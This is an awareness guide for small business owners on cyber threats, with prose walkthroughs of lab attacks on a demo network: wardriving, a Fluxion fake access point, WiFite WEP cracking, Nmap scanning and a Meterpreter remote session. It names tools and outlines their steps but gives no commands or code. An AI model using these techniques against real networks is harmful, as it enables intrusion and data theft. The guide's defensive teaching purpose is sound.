Small Business Cyber Security Awareness Guide

Introduction Business owners know potential customers are connected to the Internet at home, work and on the go. Smart phones, tablets, laptops, desktops, televisions, gaming consoles, automobiles, appliances are all devices that connect people, and their money, to a world-wide market. Just as the Internet changed the game for businesses, it also opened the world up for attack by new breed of “cyber-criminals”. These hackers use the Internet from remote locations to attack networks and devices all over the world. Over the years, criminals have preferred to target businesses over individuals because they have more profitable information to steal. The evening news is filled with stories of data breaches and corporations being attacked, for data such as credit card numbers, social security numbers and financial institution information. But over the last few years, hackers have realized that large companies are investing heavily in cybersecurity by implementing the latest intrusion detection technology and hiring teams of information security professionals to protect their data, devices and networks. That realization has placed new targets in their sights, the small business. According to customer surveys conducted by Towergate Insurance (2017), 97% of their small business customers did not make improving online security a priority, 82% do not think they are targets of attackers because they don’t have anything worth stealing, 32% do not believe they will suffer revenue loss for a day’s worth of being down after an attack, 31% don’t have an action plan to respond to security breaches, 24% think cyber security costs too much, and finally, 22% admit they wouldn’t know where to start when it comes to implementing security.

Why are small businesses targets of cyber-crime? Do most small business owners know they are now the main target? The answer is a resounding, no. In an article discussing the rise of attacks targeting small businesses, Smith (2016) points out that cyber security experts says that one of the most dangerous phrases used by small businesses is: “It’ll never happen to us”. In this year’s Internet Security Threat Report by Symantec (2016), it was found that three out of every five cyber-attacks targeted small businesses. That is a huge increase and looking at the data from Symantec over the last five years, criminals are focusing more and more on small business for their targeted attacks.

It is easy to understand why many small businesses feel they wouldn’t be targeted. They believe they are too small and hackers would not be interested in what they do, when the opposite is true. Hackers know that small businesses tend to have lower defenses than larger corporations. “By their very nature, thriving small businesses are innovative and niche, which again is very attractive to the bad guys who may be interested in customer data and intellectual property and know exactly how to pick out the weak targets.”

Why should small businesses secure their network and devices? Examples of small businesses getting hacked with disastrous results are discussed in an article from My Digital Shield (2015). The first example covers a NYC mannequin maker who had more than $1.2M stolen from its accounts as the result of a hack into online transactions. The company kept getting error messages when it tried to make online payments and didn’t realize the site they were trying to pay on was a spoofed copy of the actual website and payments were being taken and dispersed into four other banks, then other banks from there. Another example describes the owner of two small magazine shops in Chicago, who was notified from a credit card company that a data breach had sent their customer’s credit card information to Russia. “Who would want to break into us?” the owner asked, after determining that the breach cost his business almost $22,000. A Bellingham, Washington burger joint business owner was hacked twice over a two year period, due to the lack of any security tools or configurations. The credit card company shut off his account and seized money from incoming payments and the owner was forced to close, even after spending $12,000 for an investigation and remediation payments. According to the U.S. Department of Health & Human Services (2010), the theft of a single unencrypted laptop led to a small Massachusetts provider having to settle a case for $1.5 million for violating HIPAA privacy and security rules. Data breaches cost much more than just money by damaging reputations. Losing trust could not only cost partners and customers, but future customers and business partnerships.

What threats do small businesses face from cyber-criminals? The main goal of this Cyber Security Awareness Guide is to give the small business owners an educational reference to help protect their company and its assets. Simply being aware that the business is targeted for attack and knowing methods of attackers will reduce the chances of a successful breach. •

Malware – Malware is a broad term that covers several types of computer code which has malicious intent that focuses on destroying something on a computer or stealing data. Malware is often introduced to a system via email attachments, imbedded in software downloads or unpatched operating system vulnerabilities. Some examples are: o Trojan - A Trojan horse or Trojan is often disguised as legitimate software, commonly a file that has the same name of an operating system file it replaced. o Virus – A computer virus spreads by copying of itself into program files, spreading from one computer to another, infections systems and flooding networks as it travels. Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program. o Worm - Computer worms are similar to viruses in that they replicate copies of themselves and can cause the same type of damage, but do not require a host program to spread. o Spyware – Spyware is malware generally attached to downloadable files without the user’s knowledge to capture keystrokes, passwords, or other data.

Example: Ever see a popup prompting that the system has been infected and software needs to be downloaded to clean it? Or a popup stating “Congratulations, you have won a free…. “

These are traps used by hackers, many times embedding software into websites most users should avoid, such as “free” movie or music download website. If a user isn’t aware, they could panic install the real malware payload and basically give away control of their own system, thinking they were fixing a problem when they just made it far worse.

•

Phishing - Phishing is the attempt to gather items such as usernames, passwords, credit card numbers or other sensitive information by presenting a malicious link in a seemingly legitimate email. The best way to combat against phishing techniques is to learn how to recognize them. Examples: One of the most popular email phishing schemes is spoof what looks like an official email from a prominent bank. It happens so often that Bank of America (2017), in order to protect its customers and others, set up an Online Banking Email Fraud page on their website to warn of this malicious activity:

According to PhishTank (2016), here are some things to look for in a phishing email: 1. Generic greeting. To save time, Internet criminals send phishing emails in large batches and use generic names like “Security Alert” or “Generic Bank Name Customer" so they don't have to type all recipients' names out and send emails one-by-one.

2. Spoofed link. Even if a link has a recognizable name, it doesn't mean it links to a real organization. Roll the mouse over the link and see if it matches what appears in the email. If there is a discrepancy, don't click on the link. Also, websites where it is safe to enter personal information begin with "https" — the "s" stands for secure. If "https" is not seen, do not proceed. Example:

3. Links to fake account pages. The point of sending phishing email is to trick someone into providing personal information. If an email requesting personal information is received, it is most likely a phishing attempt. In this sample, an email would send someone to a fake Google page in order to steal their login name and password. This is also done with fake banking pages, social media sites like Facebook or Twitter. Example:

4. Sense of urgency. Internet criminals try to illicit personal information quickly by trying to convince a user into thinking something happened that requires and immediate response. The faster they get the information, the faster they can move to another victim.

•

Password Attacks: There are several types of password attacks: o Fake websites: Spoofed sites that look real, but are not. Often a user will click on a link in an email, website or even in a social media messenger the re-directs them to a fake page that looks very real.

o Brute-force – Program guesses passwords until the hacker gets in. Uses programs to try combinations of various dictionary words. Cain and Abel is a Brute Force password cracker. Should a thief steal a laptop, it would be easy to boot from a USB drive running hacking tools to run this program, which would grab all of the local passwords for easy logon.

Mobile Smart Devices – The New Threat Over the years, the primary targets of hackers have been the servers, desktops and laptops of businesses, because they have been the primary devices connected to the Internet. In much the same way cyber-criminals redirected their attack focus from large businesses to small, cybersecurity analysts say nefarious forces are increasingly turning their attention to the most personal computer one owns, the device carried everywhere and trust with some of the most sensitive secrets, the mobile smart device. “Over the last two years or so, we have seen a huge influx” in the number of hackers targeting smartphones, says Roel Schouwenberg, principal security researcher for Kaspersky Labs, to CBC News (2014) in a story discussing how these devices are becoming prime target for criminal hackers. Mobile smart devices are small electronic gadgets that put the power of a computer in the palm of a hand, connected to other devices or networks via wireless protocols such as Bluetooth, NFC, Wi-Fi, and 3G/4G cellular services. Smartphones and tablets carry the most personal and financial information of the small business owner contained in contacts lists, online shopping, mobile banking and credit card apps. Internet access via a mobile smart device allows small business owners to access cloud storage, where they could store important business documents, contracts, bids, service level agreements and much more. Many small business owners also use smartphones and tablets to process credit cards using 3rd party magstripe and smartchip readers and installed mobile apps. The breech of one of these device by criminals would be devastating to a small business and their customers.

Hackers have started targeting these devices in several ways. Sometimes it is malware implanted using the same email attacks directed at personal computers, being delivered via mobile email apps. SMiShing (SMS phishing) is another common attack method, sending an SMS text with what looks like account notifications, in the hopes the device owner will click on the link and receive a virus download to the phone.

In a review of the Mobile Malware Evolution 2016 by Unuchek (2017), it was reported that Kaspersky Labs detected 8,526,221 malicious installation packages, 128,886 mobile banking Trojans and 261,214 mobile ransomware Trojans. The trends of 2016 were: o Growth in the popularity of malicious programs using super-user rights, primarily advertising Trojans. o Distribution of malware via Google Play and advertising services. o Emergence of new ways to bypass Android protection mechanisms. o Growth in the volume of mobile ransomware. o Active development of mobile banking Trojans.

This year, Unuchek (2017) of Kaspersky Labs reported they have started calculating the distribution of mobile software based on number of detected installation packages.

In 2016, the volume of Mobile Trojan-Ransomware increased noticeably both in the number of users attacked as well as installation packages detected

Latest Hacking News (2017) posted an article showing images of Samsung Galaxy S7 hacked with Ransomware, where victim was infected while using the popular Facebook Messenger app. A penalty notice warned the victim that they would be reported as having sexual child abuse content on the phone unless a ransom was paid via secure online payment platform, PaySafeCard.

Physical Access What if a thief break into a small business owner’s car or home and steals their laptop? What if a criminal has gained access to a home office via break-in or social engineering tactics such posing as city inspector, a gas company employee claiming there is a gas leak or a person from the “cable company” here to fix the wireless problem that he created by jamming the wireless access point. Even if a computer has a password, that doesn’t mean a hacker won’t be able to get to the data. Simply inserting and booting from a USB key would grant access to a computer that hasn’t been properly configured and encrypted.

Once the computer has been booted via USB, the attacker has full access to the hacking toolkit included, as well as all of the files contained on the hard drive.

Here we see access all the way down to the Documents folder containing vital working documents to our small business owner. These can be copied to the USB drive for later review. The hacker can also embed malware into the system or any of the files on the system, and if they are emailed to another location, the hacker has a backdoor in.

If granted physical access to a device, hacker could place a keylogger into an open USB port, plant a wired or wireless server or boot into an unencrypted laptop or desktop to steal data. Many criminals use social engineering skills to put themselves into positions which allow physical access, such as posing as cable installers, maintenance personnel, telephone or power workers or potential customers. Physical security is every bit as important as cybersecurity. o Keyloggers - Track keystrokes, to include User IDs and passwords by emulating combinations of trusted USB devices, such as gigabit Ethernet, serial, flash storage and keyboards, computers are tricked into divulging data, taking documents, installing backdoors and many more exploits.

Would the common computer user notice this little key grabber plugged in between the computer and keyboard?

The Hak5 Bash Bunny, the latest and greatest keylogger, is capable of carrying multiple payloads. Plugged into a long cable connected to a USB port in the back of a computer case, easily hidden and unnoticed.

A Raspberry Pi Zero W (right) with Kali Linux is a portable, fully operational hacking PC. Easily hidden in an office, running wirelessly, this devices can access information on the machine and transmit it over the Internet anywhere in the world. Running PoisonTap (left) can hack locked workstations.

Examples of real hacking techniques.

The most effective way to demonstrate weaknesses to a small businesses is to use the same mindset, tools and methods of cybercriminals and hackers. This guide demonstrates how devices and networks are compromised by attacking systems set up to mirror the same environment many home-based businesses use to conduct their day to day business. Attacking the Network •

Find the target with WarDriving: Using a laptop connected to a wireless adapter and a USB GPS receiver is an old school, tried and true way of allowing a hacker to drive around in a vehicle, surveying the area for wireless networks and evaluating their security. A more modern technique is to use a smartphone, as they come with wireless and GPS built in. The collected information is stored in a database for later analysis. The data can be sorted and imported into a mapping application like Google Earth for hackers to have a roadmap or uploaded to websites where hackers collaborate and share information with each other. This information is then publicly available, not just for hackers, but people looking for open access points to download or upload illegal content or spam email. When the authorities conduct their investigations, the trail will lead to some innocent home or business owner instead of the perpetrator.

•

Wireless Password Theft – Password theft on wireless networks generally are achieved in two ways:

o

Fluxion- Wireless Access Point Spoofing: Spoofing works by presenting users with what looks like a legitimate Wireless Access Point (WAP), when in reality it’s just a laptop with two wireless cards playing man in the middle. The rogue WAP presents what appears to be the real SSID and tricks them into connecting to it. Once the user enters the password to connect, it is stored by the hacker.

o WiFite - Brute Force Cracking: The stealthy way to crack wireless password is to capture real network traffic between a legitimate user and the WAP. The cracking tool sends a signal to a client which kicks it off of the wireless network, then captures the encrypted packets when it authenticates. Those packets are then taken back to a more powerful computer, where it runs brute force tools against dictionary lists to discover.

•

Footprinting: Once the hacker has access to the internal network, the information gathering begins by using scan tools to find the devices. Once the devices are detected, tools are run to find the Operating System type so targeted payload attacks can be launched. NMAP is the tool used to find devices and determine the operating system.

•

Attack Systems: Attack system with live exploits to gain access by delivering a payload that lets a hacker control the system. The demonstration will cover the AFTER attack so as to not spread live attack

WarDriving Demonstration: Kismet A Kali Linux laptop running Kismet connected to a TP-Link wireless adapter and a GlobalSat USB GPS receiver, WarDriving a neighborhood to collect wireless access point information and their GPS locations.

The collected data can be extracted from the wardriving database and imported into a mapping program like Google Earth.

Modern wardrivers keep it simple, using their smartphones that come with wireless and GPS built in. While not getting the same range as the old school laptop, using a smartphone running WiGLEWiFi is far more discrete and effective.

Once the data is captured, it can easily be uploaded to wigle.net, a site used by wardrivers to collaborate and share captured data.

Wireless Access Point Spoofing Demonstration: Fluxion Fluxion is used to trick a user into giving away their password by capturing information from a real wireless access point, then jamming it while putting up a fake access point for the victim to enter their password. In this demonstration, Fluxion has targeted SmallBizDemo

The target wireless access point has been identified, once the deauth command is sent, the android device will be kicked from the real access point.

When the device tries to reconnect, it will send an encrypted handshake that is then captured by fluxion when it tries to reconnect to the real WAP.

When the check handshake option is checked, the information gathered from the WAP is displayed. Then a fake access point is created with the information gathered, jamming the original access point while presenting the client with a spoofed SSID.

When presented with the fake WAP, the victim will attempt to enter the ACTUAL password, thinking they are attaching to the real AP.

Fluxion will compare the password captured from the victim to the captured encrypted handshake and verify the password is authentic.

Brute Force Cracking Demonstration: WiFite WiFite is an automated wireless attack tool which can mount multiple wireless access point attacks against WEP and WPA encryption. WiFite excels at: •

sorting targets by signal strength cracking closest access points first

•

automatically de-authenticating clients of hidden networks to reveal SSIDs

•

filtering to specify exactly what to attack WEP, WAP or both

•

“anonymous” feature, changing MAC to a random address before attacking, then changes back when attacks are complete

•

smart WPA de-authentication, cycles between all clients and broadcast deauths

•

displays session summary at exit, shows cracked keys

•

all passwords saved to cracked.txt

Start WiFite and chose a network adapter capable of monitor mode.

When monitoring starts, a list of access points will be presented, in this case the SmallBizDemo wireless access point will be the target of attack.

In just minutes, the WEP encryption key is attacked and captured, demonstrating how easy it is to break WEP.

•

Footprinting: Gathering information about the target by using scan tools against network and system ports with NMap. The process begins by running NMap on the exploited network to gather information about systems, but scanning the entire subnet. .

• The HP computer with the IP of 10.0.0.6 will be the target, as it is probably a Windows computer. Running NMap against the IP address confirms the suspicion

.

Now that a target has been chosen and an often exploitable operating system has been found, the attack methods will change to target specific attack methods the system over the wireless network.

•

Attack Systems: Attack system with live exploits to gain access by delivering a payload that lets a hacker control the system. The demonstration will cover the AFTER attack so as to not spread live attack methods and techniques.

Once the attack has occurred and the backdoor into the system is opened, the hacker has complete Meterpreter shell access was well as his complete hacking toolkit. This screenshot shows the exploit running in a background process on the target computer and has opened a session back to hacking system on 10.0.0.18.

Here the attacker is connected and in the root of C: drive. Change directories to Users\Mama\My Documents would grand access to the same small business owner files shown above in the physical access attack. Except this time, the hacker is sitting in his car across the street, free of fear of getting caught.

With this kind of remote access, the attacker can launch any number of attacks on the small business owner. He could inject other malware to infect customers or partners of the business, hijack the system with Ransomware by encrypting the hard drive and locking the owner out.

The screenshot below offers a scary option to a cybercriminal with the Webcam commands. What kind of compromising material can be capture by snapping pictures or starting a video stream by activating the web camera?

If a business suspects that it has been the victim of a Cyberattack: •

Inform local law enforcement or the state attorney general.

•

Report stolen finances/identities and other cybercrimes to the Internet Crime Complaint Center: http://www.ic3.gov/

•

Report fraud, identity theft, scams or rip-offs to the Federal Trade Commission: http://www.onguardonline.gov/file-complaint

•

Report computer or network vulnerabilities to US-CERT via the hotline: 1-888-282-0870 or the US-CERT website: http://www.us-cert.gov/

Recommended Reading New NIST Guide Helps Small Businesses Improve Cybersecurity https://www.nist.gov/news-events/news/2016/11/new-nist-guide-helps-small-businessesimprove-cybersecurity

Federal Communications Commission – Cybersecurity for Small Business https://www.fcc.gov/general/cybersecurity-small-business

NIST - Small Business Information Security: The Fundamentals https://doi.org/10.6028/NIST.IR.7621r1

U.S. Small Business Administration – Cybersecurity Resources for Small Business Owners. https://www.sba.gov/content/introduction-cybersecurity

Department of Homeland Security: Stop. Think. Connect. Small Business Resources https://www.dhs.gov/publication/stopthinkconnect-small-business-resources

US Computer Emergency Readiness Team: Resources for Small Businesses https://www.us-cert.gov/ccubedvp/smb

National Cyber Security Alliance https://staysafeonline.org/ 'Ransomware' scam leaves victims powerless http://www.wsmv.com/story/27732818/ransomware-scam-leaves-victims-powerless

Images of Samsung Galaxy S7 hacked with Ransomware https://latesthackingnews.com/2017/03/27/images-samsung-galaxy-s7-hacked-ransomware/